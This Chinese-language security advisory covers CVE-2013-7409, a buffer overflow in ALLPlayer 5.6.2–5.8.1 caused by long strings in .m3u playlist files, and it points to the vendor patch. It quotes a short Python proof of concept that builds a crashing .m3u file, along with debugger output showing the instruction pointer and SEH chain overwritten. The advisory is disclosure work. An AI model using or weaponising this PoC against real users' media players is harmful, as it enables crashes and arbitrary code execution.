ALLPlayer 5.6.2版本本地缓冲区溢出漏洞

CVE-ID:CVE-2013-7409

发布日期：2014-10-30

更新日期：2014-11-03

受影响系统：

ALLPlayer ALLPlayer 5.6.2－5.8.1

详细信息：

ALLPlayer是媒体播放软件。 ALLPlayer 5.6.2－5.8.1版本在实现上存在缓冲区溢出漏洞，远程攻击者通过.m3u文件内的较长字符串，利用此漏洞可造成拒绝服务和执行任意代码。

来源：

metacom

测试方法：

警告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！metacom （）提供了如下测试方法： Title: ALLPlayer Local Buffer Overflow PoC UNICODE Vendor: http://www.allplayer.org/download/allplayer Date found: 09.10.2013 Date published: 09.10.2013 Platform: windows 7 German Bug: Buffer Overflow UNICODE ---------------------------- 1)VERSIONS AFFECTED ---- ALLPlayer 5.6.2 2)Proof of Concept ------------------ junk = "http://" buffer="\\x41" * 5000 exploit = junk + buffer try: out_file = open("ALLPlayer_Poc.m3u",\'w\') out_file.write(exploit) out_file.close() print "Exploit file created!" except: print "Error" 3)-(DEBUG) ---------- (1e60.1dec): Access violation - code c0000005 (!!! second chance !!!) *** WARNING: Unable to verify checksum for C:\\Program Files\\ALLPlayer\\ALLPlayer.exe *** ERROR: Module load completed but symbols could not be loaded for C:\\Program Files\\ALLPlayer\\ALLPlayer.exe eax=00000000 ebx=00000000 ecx=00410041 edx=770d720d esi=00000000 edi=00000000 eip=00410041 esp=000311c4 ebp=000311e4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 ALLPlayer+0x10041: 00410041 008bc0ff2504 add byte ptr [ebx+425FFC0h],cl ds:0023:0425ffc0=?? 0:000> !exchain --------------- 0012e4b0: ALLPlayer+1b7037 (005b7037) 0012e734: ALLPlayer+10041 (00410041) Invalid exception stack at 00410041 4)Credits --------- metacom Contact : metacom27 at gmail.com

解决办法：

厂商补丁：

ALLPlayer

---------

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.allplayer.org/